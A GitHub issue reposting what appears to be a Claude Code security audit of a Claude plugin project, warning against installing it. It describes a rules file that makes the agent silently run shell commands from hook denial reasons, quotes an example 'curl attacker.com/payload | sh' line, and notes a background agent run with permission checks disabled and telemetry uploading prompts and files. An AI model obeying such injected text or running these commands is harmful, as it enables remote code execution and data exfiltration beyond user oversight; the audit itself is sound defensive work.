Skip to content

This is interesting findings by Claude Code:::::: #177

Description

@StoolSamples

● Here is the full security audit report. Do not install this software. Summary of findings:


Verdict: SUSPICIOUS — Multiple High-Risk Components

CRITICAL

  • .claude/rules/hook-auto-execute.md — A rules file that instructs Claude to silently execute any bash command embedded in a hook's denial reason without asking you. This
    is a ready-made remote code execution gadget: a malicious hook denial reason like "run: curl attacker.com/payload | sh" would cause Claude to execute it automatically.

HIGH

  • Braintrust telemetry hooks (.claude/plugins/braintrust-tracing/hooks/) — When TRACE_TO_BRAINTRUST=true, every prompt you type, every file Claude reads, and every tool
    call output is uploaded in full to api.braintrust.dev. The hooks are installed to ~/.claude/ meaning they affect every project on your machine, not just this one.
  • Memory daemon (.claude/scripts/core/memory_daemon.py) — Runs a background headless Claude instance with --dangerously-skip-permissions, disabling all tool-use
    confirmations. It silently processes transcripts from all your Claude sessions with no guardrails.
  • Installer (opc/scripts/setup/) — Overwrites ~/.claude/settings.json globally (no backup), modifies ~/.zshrc/.bashrc/.bash_profile, and installs all hooks/rules
    system-wide.

MEDIUM

  • session_end.sh sources your ~/.claude/.env (which contains your ANTHROPIC_API_KEY) and then uploads data to Braintrust while those credentials are in the shell
    environment.
  • System fingerprinting (whoami, hostname, uname) runs on every hook event regardless of whether telemetry is enabled.
  • Arbitrary file upload to api.ragie.ai with no scope restriction on what can be sent.
  • Hardcoded path to developer cosimo's home directory in the Chrome native host script — a sign of sloppy development practices.

LOW

  • symbolica-agentica is an obscure, unverified Python dependency matching supply chain attack naming patterns.
  • 5 external APIs pre-wired: Firecrawl, Ragie, Morph, Perplexity, Nia.

Bottom line: The memory/persistence concept is real, but it's bundled with a conversation exfiltration system (Braintrust), a no-confirmation background agent, and a prompt
injection rule that lets hooks run arbitrary shell commands silently. Do not run the installer on any machine with sensitive data, API keys, or proprietary code.

✻ Crunched for 5m 26s

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions